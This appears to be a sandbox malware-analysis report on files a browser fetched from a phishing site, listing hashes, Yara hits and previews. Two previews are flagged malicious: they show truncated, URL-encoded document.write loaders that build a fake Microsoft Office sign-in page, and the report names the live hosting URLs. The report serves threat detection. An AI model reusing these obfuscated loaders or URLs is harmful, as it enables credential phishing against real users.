Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x26d1ca61,0x01d6ea1b</date><accdate>0x26d1ca61,0x01d6ea1b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x26d1ca61,0x01d6ea1b</date><accdate>0x26d1ca61,0x01d6ea1b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.134724051812653
Encrypted:	false
SSDEEP:	12:TMHdNMNxhGwMWdnWimI002EtM3MHdNMNxhGwMWdnWimI00Ob8K075EtMb:2d6NxQsSZHKd6NxQsSZ7YKajb
MD5:	A4466CA88EFBAA7B7E46D44158BF29EB
SHA1:	617B89B0376FCBA04A51B5F65E3EBF8BC6AE70C4
SHA-256:	58BFE3A4807985458E235A4A6DDCF7C5CD0D323B9EBF9AEA4C29FC8E4399E812
SHA-512:	7087465B96E2EDE4A4AE864BB18D9BCB5BAEAA41F0F4F70664269E2365F12E69F75637CFB0CD3B8EA5F4308561AF7C63FBA4FCF2E603127B66E45A663791AFD7
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x26d42ca9,0x01d6ea1b</date><accdate>0x26d42ca9,0x01d6ea1b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x26d42ca9,0x01d6ea1b</date><accdate>0x26d42ca9,0x01d6ea1b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.052073495968335
Encrypted:	false
SSDEEP:	12:TMHdNMNx0nMjhjKnWimI002EtM3MHdNMNx0nMjhjKnWimI00ObxEtMb:2d6Nx0bSZHKd6Nx0bSZ7nb
MD5:	BAA84963960518D81A4E0F0583A9B85A
SHA1:	4EC978BFF200894CDBA1D0A7AAE41A4C78EDE813
SHA-256:	033E76B15CCE25385FB5865D8D14A5896B4279180EB0B3C53AA78B6C5EDFE039
SHA-512:	791A1B130D9FF08D7F876AC4FC8FC4D11BDDFCDDFDFC81F7AEFC5663484A5D4300287F1B0F976680088841BDDC2A1D935A0A46517AF2BEE2FD45108EDA12691A
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x26d1ca61,0x01d6ea1b</date><accdate>0x26d1ca61,0x01d6ea1b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x26d1ca61,0x01d6ea1b</date><accdate>0x26d1ca61,0x01d6ea1b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.09195528302478
Encrypted:	false
SSDEEP:	12:TMHdNMNxxMjhjKnWimI002EtM3MHdNMNxxMjhjKnWimI00Ob6Kq5EtMb:2d6NxtSZHKd6NxtSZ7ob
MD5:	67C115AF874EEE8D72F97165ECCB3758
SHA1:	ECE93F53B397C78266072C073E5561D0426E41A5
SHA-256:	55D47F622367AD74DD4702B279C2E62D9E6BF0258B9A99137AE88A55596C1FE8
SHA-512:	63574C11024ADD4A8F789C79A6214A94C61B80B17744FE7B05D3676C2EF85A7DB91F864106EC9E470189EFBFB5E67C9411BA415C04B3CEEABAF26E9AC46B36E8
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x26d1ca61,0x01d6ea1b</date><accdate>0x26d1ca61,0x01d6ea1b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x26d1ca61,0x01d6ea1b</date><accdate>0x26d1ca61,0x01d6ea1b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	659
Entropy (8bit):	5.082422446021467
Encrypted:	false
SSDEEP:	12:TMHdNMNxcM3YnWimI002EtM3MHdNMNxcM3YnWimI00ObVEtMb:2d6NxuSZHKd6NxuSZ7Db
MD5:	15A8C92A0E009CC2485F2FCD740C4E65
SHA1:	212633DFA89D19994AD418B83615DD20685DC412
SHA-256:	EDB354CE988624CD11BB20E60B16FC887C65980077E18246319609ABCD870C46
SHA-512:	D6AE714535547B0F646C199FDF0D241F9253D47308FB114BEE474AAE3F847F30A0639E1EB3D545A1F8F6714A49AE640CFA2B2B946F854F8F39D2C480B2C72230
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x26cf680a,0x01d6ea1b</date><accdate>0x26cf680a,0x01d6ea1b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x26cf680a,0x01d6ea1b</date><accdate>0x26cf680a,0x01d6ea1b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.052766932668674
Encrypted:	false
SSDEEP:	12:TMHdNMNxfnMjhjKnWimI002EtM3MHdNMNxfnMjhjKnWimI00Obe5EtMb:2d6NxDSZHKd6NxDSZ7ijb
MD5:	ADD465B61FEEEE8EB6CD01911630E93D
SHA1:	DA7D936C3D99F7931C38DCBFD6B98F9CE0628590
SHA-256:	3C1CF30B42FFF262A1A5CEFD12DE9F49B873F6E48CA3613707A3D56939869ACC
SHA-512:	91060C2C0B346810D0A20FD97E7C569583CA24E4EE3C5E4CAE7A728EAFFD18B2E7A883D7156985739DE6AAE05705311C76D31FB2A84E4CB4558ED81E0892D93C
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x26d1ca61,0x01d6ea1b</date><accdate>0x26d1ca61,0x01d6ea1b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x26d1ca61,0x01d6ea1b</date><accdate>0x26d1ca61,0x01d6ea1b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\87875434-878676zxxzx[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	267
Entropy (8bit):	4.3508333859003905
Encrypted:	false
SSDEEP:	6:OFTzEU8mkUk9S1WQIv73FaR3Fau3Fa28x3Fai:OJzEU8mOmMYeN28+i
MD5:	90BEDB096E96E2F61F9CBA93E66A32D1
SHA1:	D5401C13FE0A2E30F936BAC17BD19DD8217F6587
SHA-256:	D8D834F352047EB60240C4A30290B8ACB28A309EF7B1789B747451C801BAC046
SHA-512:	B00A72D68CF304BDE5F1D4B8B031ED616BACA031058BC906147A14D7C35B0383694D11D43E785930C95A6BB665B548B05DEB8C15032B950D8EFF2F9B13F7ADD9
Malicious:	false
Reputation:	low
IE Cache URL:	https://uceniciifbi.ro/wp-content/dir-wp/87875434-878676zxxzx.css
Preview:	{ margin: 0; padding: 0; }.... html { .. background: url('00.png') no-repeat center center fixed; .. -webkit-background-size: cover;.. -moz-background-size: cover;.. -o-background-size: cover;.. background-size: cover;.. }

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\arrow[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	[TIFF image data, big-endian, direntries=4], baseline, precision 8, 29x32, frames 3
Category:	downloaded
Size (bytes):	7948
Entropy (8bit):	2.9035343408926084
Encrypted:	false
SSDEEP:	48:Kh6FnYKkh3qk/3s503qk0eUs2QU/bxquERAhKCyId:L5ZpkETk0RsFUzrEg2Id
MD5:	D9770E6DF0DBA2CA3E46CE1583D32969
SHA1:	83C5EA5FC0D13CB0E274A76BE8E47A63A5AA5655
SHA-256:	A1628CEF037D3930ABED04E0DB3EAA1FE2EEEDFD60E843DA356ADA1FF9D0D432
SHA-512:	25EEF33A5503C126EFB8F3F8554069C3EB7CA63F31A4047B0688AD8077008D42AE87EE259C9D95DD2AA694C33FFF17D0DD687E0CA01F21FF88AA9B42506797BF
Malicious:	false
Reputation:	moderate, very likely benign file
IE Cache URL:	https://i.postimg.cc/vHgYSJgT/arrow.jpg
Preview:	......JFIF.....x.x......Exif..MM.*.......;.........J.i.........T.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\off[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 994 x 356, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	36607
Entropy (8bit):	7.912225528769076
Encrypted:	false
SSDEEP:	768:rLV8+1kJX7HyXhK4DtaR690WLUkNIDpzYzBy1f6BHrxEBYVMQ71:rLVtALHsFDtaR690WIcgpjitEgMe
MD5:	B45D1E9490DF757F6AA15FF1DFA74CBE
SHA1:	214B5A46D5713D429CCA99B74234249CA20D8CB3
SHA-256:	6D6D501FA6EE092B755FD24FFF5E5B6B0AE4AE502E5053F03B5CC264C52CA294
SHA-512:	B9000E82D30D5F21711ECE926EA725F2635806D42C34D1D317E38FCCBD329EC93D66A1CE0070AE5702D2F862D6D647FA8A9D1AB4AED5F8EE3B2F89AF07B3EDC6
Malicious:	false
Reputation:	moderate, very likely benign file
IE Cache URL:	https://i.ibb.co/XJ3Zqnc/off.png
Preview:	.PNG........IHDR.......d......l......IDATx...x.U.....{A.%.... ...$. v.`Cl.X.;~...R..".....`.P.t.....@......3Y.Q!..l....'.dw....................U5.._.Wo..nU.:..........f.....z..w...?...\|.z>..Z..8R.......!.:.N7.}......"b..!F...&.38.........3..F./..7..6..`..H..\|......qd........`M@..4...j....#....e)..G.......J.yMU...G....\|.r.{^@...Sm.........q....#..d...}Q....\|..\|.O=............@\P.SiFz..X....dt..l.n...........gX.P....KFl..\.....>......'..Q......p.".F^;K}o....b.UF...KR.8........3...o$.z#....q&....f....T+..Z.......D^...H. k.w..C.J#....}A..D.........Q.S..x>..W9.\...2#..s\|..OR..b.......1k..rF.;.....v.......yY^.Kk.........,E.1.a$r...m.uXb.9......y.&........T.O..}......sd.....F.*HRM.R.............T-#.......E@-1?3.._...:.V.......g.OQ'..T.#..M.C.....K)8#..'.Z......<.L.....>5..^....1..H......9<.........r.\|.B#t.M...z>...b..mn.:..........r.U5#l]MLE^.66..\|..W..........LA.u.Z..A...A.......W....)?.........!.\|7...&r.Qb..v#.o...vk..r\%......%$/I50.....yH'QLl....M{y(7

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\00[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 1920 x 1039, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	503048
Entropy (8bit):	7.960416555524918
Encrypted:	false
SSDEEP:	12288:oTml2w8K/yhmvO+0RHhhkpM1XCAl+l9V9+KUqC31lVJO:oCaoqmvO+0xhOMZCPncnVM
MD5:	9EDC2BE222762F14FAD1642035AE5F36
SHA1:	16AFB4AFB50993AA33C8B6F4EAEDB46AE5CF4C59
SHA-256:	07E4A81F6D8D46168779EB10E9B882DD2CE70ED1EC39F75617C321E5A3F72D43
SHA-512:	8A009828BF5726B15086F663633215DE05C22FE89C28389771B0F05F73082BBF907B6AD9079AF91EDC045384B554EAD3D8CD09CA7C2FE05B85E8023246AA7BDA
Malicious:	false
IE Cache URL:	https://uceniciifbi.ro/wp-content/dir-wp/00.png
Preview:	.PNG........IHDR...............V.. .IDATx^.W..F..y\.."3"%S..L.U..=KV..kf.r....?....[...lu.LwU.(.2%S..!=...8<.p.a..?....n..k..`......ogggD._t..W~._}..3z..}^...-^,B...`T8.A<'e.........@..^.2`Y~..e..V0..@..@ .......F.A..@..@..@ U.._.w..K.d.^..}.....Q..+..O..r"M....._.....S5.....).f\.R.!0..@........&..,..... .. ...&.............]...-...H7........&..3..{...w~/.E.m.;Y.wB.hd.B...u.....................................@.."zk2....j...,.......\|.....JG.B.R.!$Rm\.U.......qdhQ0....$F ..lb.A. .. .. .. .. .. .. .. .. ...9Zw...mD`M.nl..=`..C.x.Y...... .. .. ...!...yv..R.............C..................j..-"p.r.?.......Is.m.........................................@...(.&..=.s.h.....]f.XB@...M....i.+...CuN..zY._...&....@..p....ES@..@..@..@..@ d...\|.2>... ...^.t.L.g..7ll.............Tm._.C.G<..:....@..@..@ ^.Y.4.K...............E +.ma.............8......q........lx......._.....q.-... ...\.S...wf... .. .. .. .. .. .. .. .. .....<._...e.z^gN^8o.....%.....>.B..].....;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\7565654564[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF, LF line terminators
Category:	downloaded
Size (bytes):	12546
Entropy (8bit):	3.226267564937579
Encrypted:	false
SSDEEP:	96:pm2PYAKzG7kdEsZVmwqCbaqFW725bzQeHEv9n4TVU7JlU+xTDv:pm2l3YmBPqg71GO9lU+xTDv
MD5:	A07A9EE2F6041708DA29633E041AB6B3
SHA1:	BD8227AD11E2EEB361D33FD67506E473A61D0ED5
SHA-256:	05D8B33C50EBFC8254C73EC8411368EB5254EF806FF2EBA867AF66DBDFAB4FAA
SHA-512:	8759160F8B31C43B366EDD2B93955A41F0CBB5DF3C02C7172E8E629823D7CCC5B80FA6CAD74EBD97F3750BD02F853B5E13B3C1E23B2157D632529AFCD33A43D7
Malicious:	true
Yara Hits:	Rule: JoeSecurity_HtmlPhish_6, Description: Yara detected HtmlPhish_6, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\7565654564[1].js, Author: Joe Security
IE Cache URL:	http://yourjavascript.com/18210902102/7565654564.js
Preview:	document.write( unescape( '%3C%68%65%61%64%3E%0A%0A%3C%74%69%74%6C%65%3E%4D%69%63%72%6F%73%6F%66%74%20%4F%66%66%69%63%65%20%43%65%6E%74%65%72%3C%2F%74%69%74%6C%65%3E%0A%09%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%74%79%70%65%3D%22%74%65%78%74%2F%63%73%73%22%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%6D%61%78%63%64%6E%2E%62%6F%6F%74%73%74%72%61%70%63%64%6E%2E%63%6F%6D%2F%62%6F%6F%74%73%74%72%61%70%2F%33%2E%33%2E%37%2F%63%73%73%2F%62%6F%6F%74%73%74%72%61%70%2E%6D%69%6E%2E%63%73%73%22%3E%0A%0A%20%20%20%20%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%68%6F%72%74%63%75%74%20%69%63%6F%6E%22%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%69%63%6F%6E%6A%2E%63%6F%6D%2F%69%63%6F%2F%33%2F%65%2F%33%65%72%68%6E%68%67%6F%33%6B%2E%69%63%6F%22%20%2F%3E%0A%3C%2F%68%65%61%64%3E%0A%0A%3C%6C%69%6E%6B%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%74%69%6E%79%75%72%6C%2E%63%6F%6D%2F%79%35%36%39%39%35%62%62%2F%30%30%30%39%30%39%38%6C%6D%2E%63%73%73%22%20%72%65%6C%3D%22%73%74%79%6C%

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\jquery-1.8.2[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text
Category:	downloaded
Size (bytes):	265218
Entropy (8bit):	5.065984850018804
Encrypted:	false
SSDEEP:	6144:fU8Z4dmM/cW4OfYNH/69bQPMn2Zlhx0oIpo03/wo/GEclctg08Ok07rqJDO3IAt:1W4OfiZdZy7mrAt
MD5:	3A316818411B5A80EF878DC5C8483950
SHA1:	A0F48B6AD5322B35383FFCB6E2FA779B8A5FCFFC
SHA-256:	CFA69516375E27E56519CAE71F28818E0E52515B70E705A600D1DB459998335A
SHA-512:	68CCE216CF4AF7C89F85D141CFCB16D448EDC1F542314B6E2031789480ECF0921ACD91B20D3CD70DD5AF89DC2CD2D27F78BCA2336967FC2E8D72FA76A996ED7D
Malicious:	false
IE Cache URL:	http://code.jquery.com/jquery-1.8.2.js
Preview:	/!. jQuery JavaScript Library v1.8.2. * http://jquery.com/. . Includes Sizzle.js. * http://sizzlejs.com/. . Copyright 2012 jQuery Foundation and other contributors. * Released under the MIT license. * http://jquery.org/license. . Date: Thu Sep 20 2012 21:13:05 GMT-0400 (Eastern Daylight Time). */.(function( window, undefined ) {.var..// A central reference to the root jQuery(document)..rootjQuery,...// The deferred used on DOM ready..readyList,...// Use the correct document accordingly with window argument (sandbox)..document = window.document,..location = window.location,..navigator = window.navigator,...// Map over jQuery in case of overwrite.._jQuery = window.jQuery,...// Map over the $ in case of overwrite.._$ = window.$,...// Save a reference to some core methods..core_push = Array.prototype.push,..core_slice = Array.prototype.slice,..core_indexOf = Array.prototype.indexOf,..core_toString = Object.prototype.toString,..core_hasOwn = Object.prototype.hasOwnProperty,..cor

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\G6D[1].svg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	3651
Entropy (8bit):	4.094801914706141
Encrypted:	false
SSDEEP:	96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
MD5:	EE5C8D9FB6248C938FD0DC19370E90BD
SHA1:	D01A22720918B781338B5BBF9202B241A5F99EE4
SHA-256:	04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
SHA-512:	C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
Malicious:	false
IE Cache URL:	http://svgur.com/i/G6D.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\bootstrap.min[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	121200
Entropy (8bit):	5.0982146191887106
Encrypted:	false
SSDEEP:	768:Vy3Gxw/Vc/QWlJxtQOIuiHlq5mzI4X8OAduFKbv2ctg2Bd8JP7ecQVvH1FS:nw/a1fIuiHlq5mN8lDbNmPbh
MD5:	EC3BB52A00E176A7181D454DFFAEA219
SHA1:	6527D8BF3E1E9368BAB8C7B60F56BC01FA3AFD68
SHA-256:	F75E846CC83BD11432F4B1E21A45F31BC85283D11D372F7B19ACCD1BF6A2635C
SHA-512:	E8C5DAF01EAE68ED7C1E277A6E544C7AD108A0FA877FB531D6D9F2210769B7DA88E4E002C7B0BE3B72154EBF7CBF01A795C8342CE2DAD368BD6351E956195F8B
Malicious:	false
IE Cache URL:	https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
Preview:	/!. Bootstrap v3.3.7 (http://getbootstrap.com). * Copyright 2011-2016 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). //! normalize.css v3.0.3 \| MIT License \| github.com/necolas/normalize.css */html{font-family:sans-serif;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:700}dfn{font-style:italic}h1{margin:.67em 0;font-size:2em}mark{color:#000;background:#ff0}small{font-size:80%}sub,sup{position:relative;font-size:75%;line-height:0;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\0009098lm[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	153221
Entropy (8bit):	5.142355013542585
Encrypted:	false
SSDEEP:	1536:+n1QWSUPBT+QYYDnDEBi82NcuSEz/NvT/gIENM6HN26ji/0WUaiK:61L7PDxYIENM6HN261K
MD5:	ACF55A8739DDA447051BF052A0F919B3
SHA1:	21440192EA2845025D6779B7DA018B4AE80E407B
SHA-256:	BC7AB1E5973A4CD2E0860DBA8F5E65A79182BECBCBC60F97CBB3C6D904FAA837
SHA-512:	245128376B56A601D293E704A2F28FE3E338F2B0492991C3D659F3ABD6DE22B27671B26060DC53FD794C0CF6809052C2DDD98D1047BF279ACE78CE12B76AC3B0
Malicious:	false
IE Cache URL:	https://uceniciifbi.ro/wp-includes/ID3/0009098lm.css
Preview:	html, body{--blue:#007bff;--indigo:#6610f2;--purple:#6f42c1;--pink:#e83e8c;--red:#dc3545;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--font-family-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}*,::after,::before{box-sizing:border-box}html{font-family:sans-serif;line-height:1.15;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;-ms-overflow-style:scrollbar;-webkit-tap-highlight-color:transparent}@-ms-viewport{width:device-width}article,

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\5343434322[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF, LF line terminators
Category:	downloaded
Size (bytes):	382
Entropy (8bit):	4.143358296805142
Encrypted:	false
SSDEEP:	6:yL/Hy4KATg2E5k8z4g31qaDygANcMp4zDmXiehU3CPScdAXDQffYZz4QArCVSq07:iSP2857cg3nASJ+XPU3CPSsAkffYZues
MD5:	86C95AAFD1AE1E1BCAD2EDCE3CBDAC2C
SHA1:	5BC8CA13DACD2246272F201F915A7D37271DA6EA
SHA-256:	F75CB5FDAB358C01301CDEB6A0068116045B87535422CDCBDACA76AFE0B63C3F
SHA-512:	DFC89E27A79D0037C017AA0359B9F1230755DEE6B7A201864AEFE3AD07ECC6C955A9592EBC55EF5F4F9323239E147B4DDCC4A1BC7BC55BC197203F37199070C4
Malicious:	true
Yara Hits:	Rule: JoeSecurity_HtmlPhish_6, Description: Yara detected HtmlPhish_6, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\5343434322[1].js, Author: Joe Security
IE Cache URL:	http://yourjavascript.com/99821182021/5343434322.js
Preview:	document.write( unescape( '%3C%6C%69%6E%6B%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%74%69%6E%79%75%72%6C%2E%63%6F%6D%2F%79%78%64%36%7A%76%32%7A%2F%38%37%38%37%35%34%33%34%2D%38%37%38%36%37%36%7A%78%78%7A%78%2E%63%73%73%22%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%74%79%70%65%3D%22%74%65%78%74%2F%63%73%73%22%20%2F%3E' ) ); ....document.write(atob(unescape(drrf)));.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\arrow[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	162
Entropy (8bit):	4.43530643106624
Encrypted:	false
SSDEEP:	3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGu:q43tISl6kXiMIWSU6XlI5LP8IpfGu
MD5:	4F8E702CC244EC5D4DE32740C0ECBD97
SHA1:	3ADB1F02D5B6054DE0046E367C1D687B6CDF7AFF
SHA-256:	9E17CB15DD75BBBD5DBB984EDA674863C3B10AB72613CF8A39A00C3E11A8492A
SHA-512:	21047FEA5269FEE75A2A187AA09316519E35068CB2F2F76CFAF371E5224445E9D5C98497BD76FB9608D2B73E9DAC1A3F5BFADFDC4623C479D53ECF93D81D3C9F
Malicious:	false
Preview:	<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\jquery.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	86927
Entropy (8bit):	5.289226719276158
Encrypted:	false
SSDEEP:	1536:jLiBdiaWLOczCmZx6+VWuGzQNOzdn6x2RZd9SEnk9HB96c9Yo/NWLbVj3kC6t3:5kn6x2xe9NK6nC69
MD5:	A09E13EE94D51C524B7E2A728C7D4039
SHA1:	0DC32DB4AA9C5F03F3B38C47D883DBD4FED13AAE
